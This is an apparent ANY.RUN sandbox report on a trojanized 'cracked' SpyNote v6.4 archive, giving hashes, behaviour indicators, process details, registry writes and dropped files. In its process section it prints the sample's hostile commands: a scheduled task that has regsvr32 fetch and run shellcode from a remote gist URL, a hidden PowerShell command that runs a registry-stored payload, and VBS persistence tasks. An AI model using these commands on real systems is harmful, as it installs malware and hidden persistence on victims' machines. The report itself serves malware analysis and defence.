File name:

SpyNote v6.4 Cracked By Mohamd Hasan Mr.22 Full Private Edition.rar

Full analysis: https://app.any.run/tasks/0465a27a-7f49-4d4d-b4ee-7de9b9f981d6
Verdict: Malicious activity
Analysis date: March 30, 2019, 19:35:05
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

86EB112812FBDD74801E9768002BBB8D

SHA1:

4F62B472E9AF12949B2E5BE59310A383DC63A1D7

SHA256:

1E03B1105F82B29820EC17D388B8101C18A8C3F0D5D10DD42A8037CE9EDE9612

SSDEEP:

196608:7KtP9/yhDglPfAIyy3XLaE3VQJea8a97+2g6B:29Asl/yy2QVQA9aNK6B

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Loads dropped or rewritten executable

      • SearchProtocolHost.exe (PID: 2936)
    • Application was dropped or rewritten from another process

      • SpyNote v6.4 Cracked By Mohamd Hasan Mr.22.exe (PID: 2452)
    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 3152)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 1356)
      • schtasks.exe (PID: 988)
      • schtasks.exe (PID: 4020)
    • Changes the autorun value in the registry

      • wscript.exe (PID: 2112)
    • Registers / Runs the DLL via REGSVR32.EXE

      • cmd.exe (PID: 4032)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 992)
      • xcopy.exe (PID: 2412)
    • Starts CMD.EXE for commands execution

      • SpyNote v6.4 Cracked By Mohamd Hasan Mr.22.exe (PID: 2452)
      • wscript.exe (PID: 1692)
      • powershell.exe (PID: 2480)
    • Executes scripts

      • cmd.exe (PID: 4016)
      • cmd.exe (PID: 3152)
    • Executes PowerShell scripts

      • wscript.exe (PID: 2112)
    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 3152)
    • Creates files in the user directory

      • powershell.exe (PID: 2480)
  • INFO

    • Dropped object may contain Bitcoin addresses

      • WinRAR.exe (PID: 992)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
50
Monitored processes
15
Malicious processes
6
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winrar.exe searchprotocolhost.exe no specs spynote v6.4 cracked by mohamd hasan mr.22.exe no specs cmd.exe no specs wscript.exe no specs cmd.exe no specs xcopy.exe schtasks.exe no specs schtasks.exe no specs schtasks.exe no specs wscript.exe powershell.exe no specs attrib.exe no specs cmd.exe no specs regsvr32.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
988schtasks /create /tn "Defender" /tr "regsvr32.exe /s /i:shellcode,https://gist.githubusercontent.com/sparta34/59b82973cbbabe32c7d195f9cf8e8869/raw/618d8f693a83a52235fa4983baa95f94c6cbfd1d/cs C:\Users\Public\Music\bin\64.dll" /sc minute /mo 41 /FC:\Windows\system32\schtasks.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
992"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\SpyNote v6.4 Cracked By Mohamd Hasan Mr.22 Full Private Edition.rar"C:\Program Files\WinRAR\WinRAR.exe
explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
1356schtasks /create /tn "Scan" /tr "C:\Users\Public\Music\bin\frame4.vbs" /sc minute /mo 31 /FC:\Windows\system32\schtasks.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
1692wscript launcher.vbsC:\Windows\system32\wscript.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2036regsvr32.exe /s /i:shellcode,https://gist.githubusercontent.com/sparta34/59b82973cbbabe32c7d195f9cf8e8869/raw/618d8f693a83a52235fa4983baa95f94c6cbfd1d/cs C:\Users\Public\Music\bin\64.dllC:\Windows\system32\regsvr32.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft(C) Register Server
Exit code:
3
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\regsvr32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2112wscript.exe resvr.vbsC:\Windows\system32\wscript.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2412xcopy data3 C:\Users\Public\Music /E /HC:\Windows\system32\xcopy.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Extended Copy Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\xcopy.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ulib.dll
c:\windows\system32\gdi32.dll
2452"C:\Users\admin\Desktop\sd\SpyNote v6.4 Cracked By Mohamd Hasan Mr.22.exe" C:\Users\admin\Desktop\sd\SpyNote v6.4 Cracked By Mohamd Hasan Mr.22.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\desktop\sd\spynote v6.4 cracked by mohamd hasan mr.22.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
2480"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$y = (get-itemproperty -path 'HKCU:\' -name 'alien34').alien34;cmd /c $y"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\gdi32.dll
2936"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe4_ Global\UsGthrCtrlFltPipeMssGthrPipe4 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" C:\Windows\System32\SearchProtocolHost.exeSearchIndexer.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft Windows Search Protocol Host
Exit code:
0
Version:
7.00.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\searchprotocolhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
Total events
1 144
Read events
1 051
Write events
93
Delete events
0

Modification events

(PID) Process:(992) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(992) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(992) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(992) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\SpyNote v6.4 Cracked By Mohamd Hasan Mr.22 Full Private Edition.rar
(PID) Process:(992) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(992) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(992) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(992) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(992) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\DialogEditHistory\ExtrPath
Operation:writeName:0
Value:
C:\Users\admin\Desktop\sd
(PID) Process:(2936) SearchProtocolHost.exeKey:HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\MuiCache\62\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
Executable files
33
Suspicious files
4
Text files
554
Unknown types
16

Dropped files

PID
Process
Filename
Type
992WinRAR.exeC:\Users\admin\Desktop\sd\data\source\data1\.DS_Storeds_store
MD5:
SHA256:
992WinRAR.exeC:\Users\admin\Desktop\sd\data\.DS_Storeds_store
MD5:
SHA256:
992WinRAR.exeC:\Users\admin\Desktop\sd\data\source\.DS_Storeds_store
MD5:
SHA256:
992WinRAR.exeC:\Users\admin\Desktop\sd\data\source\data1\data2\data3\bin\frame4.vbstext
MD5:
SHA256:
992WinRAR.exeC:\Users\admin\Desktop\sd\data\d3dcompiler_46.dllexecutable
MD5:C18CAA9BA4F06A5D226A892DF6DC1D72
SHA256:996E5B57C06B5614EE7B26936B29BACE62218FB3CAD3A28DBA9E72BCC66D2698
992WinRAR.exeC:\Users\admin\Desktop\sd\data\libcurl.dllexecutable
MD5:D2819CC435E27A1DB0226E1DE9A4C468
SHA256:CE5B7AF6C48E1A9102C5D55A4401D18148B768BD3C7D4077EF5AF40C06633200
992WinRAR.exeC:\Users\admin\Desktop\sd\data\source\data1\data2\data3\bin\lime.vbstext
MD5:
SHA256:
992WinRAR.exeC:\Users\admin\Desktop\sd\data\source\data1\data2\data3\bin\resvr.vbstext
MD5:
SHA256:
992WinRAR.exeC:\Users\admin\Desktop\sd\Icons\AccountManager\com.google.pngimage
MD5:A9167F9901E0BFE4F4D3696CB894D7F2
SHA256:9C93E054668C0F1702DDE013F1C662A67A2927DCF159DD430AC900CE8ED18BCD
992WinRAR.exeC:\Users\admin\Desktop\sd\Icons\AccountManager\com.facebook.messenger.pngimage
MD5:A3E44E927AFBBCAFD1CCBA0DF328341B
SHA256:38D2CDFF888A68FA4928ADA746DB2588E76127447ACA16BEAD6E03D940D9D266
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info